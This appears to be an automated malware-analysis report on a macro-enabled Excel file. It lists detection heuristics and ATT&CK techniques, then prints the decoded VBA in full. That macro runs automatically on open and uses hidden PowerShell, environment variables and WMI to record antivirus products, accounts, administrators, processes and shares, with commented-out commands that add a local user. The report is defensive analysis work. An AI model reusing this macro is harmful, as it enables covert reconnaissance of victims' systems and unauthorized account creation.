MALICIOUS
368
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1070.004 File Deletion
T1082 System Information Discovery
T1003 OS Credential Dumping
The Auto_Open VBA macro is designed to execute automatically upon opening the document. It leverages WScript.Shell and PowerShell to gather system information, including antivirus product details and user environment variables, writing them to a temporary file named 'PSTemp.txt'. The script also contains commented-out code for adding a local user and executing commands, suggesting potential for further malicious actions. The primary intent appears to be reconnaissance and information gathering.
Heuristics 9
-
VBA project inside OOXML medium 8 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usage
-
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBA
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4442 bytes |
SHA-256: cffa37795a2c5d25fa47850ed53f15fb1d8c3f98b2bda54f1b57e10ef5e16d11 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
'
' Macro1 Macro
Dim pscmd As String
Dim cmde As String
Dim PS_GetOutput As String
Dim STxtFile As String
If STxtFile = "" Then STxtFile = Environ("temp") & "\PSTemp.txt"
pscmd = "PowerShell -windowstyle hidden -NoProfile -NoLogo -ExecutionPolicy Bypass -Command Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct" & pscmd
pscmd = pscmd & " | Out-File '" & STxtFile & "' -encoding ASCII"
'CreateObject("WScript.Shell").Run pscmd, 0, True
'cmde = "cmd net user test test123 /add" & cmde
'CreateObject("WScript.Shell").Run cmde
'User Info Variables
Dim uname As String
Dim coname As String
Dim udomain As String
Dim Ddomain As String
Dim DNSdomain As String
Dim OS As String
Dim Proxystat As String
'Gathering User Info
uname = Environ$("username")
'MsgBox (uname)
coname = Environ$("computername")
udomain = Environ$("userdomain")
Ddomain = Environ$("userdnsdomain")
DNSdomain = Environ$("logonServer")
OS = Environ$("os")
Proxystat = Environ$("https_proxy")
'Add the collected details to the txtfile
Open STxtFile For Append As #1
Write #1, uname
Close #1
Open STxtFile For Append As #2
Write #2, coname
Close #2
Open STxtFile For Append As #3
Write #3, udomain
Close #3
Open STxtFile For Append As #4
Write #4, Ddomain
Close #4
Open STxtFile For Append As #5
Write #5, DNSdomain
Close #5
Open STxtFile For Append As #6
Write #6, OS
Close #6
Open STxtFile For Append As #7
Write #7, Proxystat
Close #7
'Gather Local Users
sComputerName = "."
i = 7
Set oWMIsvc = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & sComputerName & "\root\cimv2")
Set oWMICUserAcctDetails = oWMIsvc.ExecQuery _
("Select * from Win32_UserAccount Where LocalAccount = True")
For Each oAcct In oWMICUserAcctDetails
i = i + 1
Open STxtFile For Append As #i
Write #i, oAcct.AccountType, oAcct.Caption, oAcct.Description, oAcct.Disabled, oAcct.domain, oAcct.FullName, oAcct.LocalAccount, oAcct.Lockout, oAcct.Name, oAcct.PasswordChangeable, oAcct.PasswordExpires, oAcct.PasswordRequired, oAcct.SID, oAcct.SIDType, oAcct.Status
Close #i
Next
'Gather Admin User
Set aadmin = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & sComputerName & "\root\cimv2")
strQuery = "Select * FROM Win32_GroupUser WHERE GroupComponent=" & """" & "Win32_Group.Domain='" & strCName & "',Name='Administrators'" & """"
Set LocalAdminItems = aadmin.ExecQuery(strQuery)
Open STxtFile For Append As #1
Write #1, "Admin Accounts Found"
Close #1
For Each Admin In LocalAdminItems
i = i + 1
Open STxtFile For Append As #i
Write #i, Admin.PartComponent
Close #i
Next
'Process Details
Set objServices = GetObject("winmgmts:\\" & sComputerName & "\root\cimv2")
Set ObjProcessSet = objServices.ExecQuery("Select * FROM Win32_Process", , 48)
Open STxtFile For Append As #1
Write #1, "Process Details"
Close #1
For Each Process In ObjProcessSet
i = i + 1
Open STxtFile For Append As #i
Write #i, Process.Name, Process.ProcessId, Process.ExecutablePath
Close #i
Next
'Network Shares
Open STxtFile For Append As #i
Write #i, "NetworkShares"
Close #i
Set shareItems = objServices.ExecQuery("Select * from Win32_Share")
For Each share In shareItems
i = i + 1
Open STxtFile For Append As #i
Write #i, share.Name, share.Path
Close #i
Next
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerive
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 26624 bytes |
SHA-256: 8d257d0c74063d625ab17a17c35ba9cb046e9b7a043c171ec8c8724f0abd32b0 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.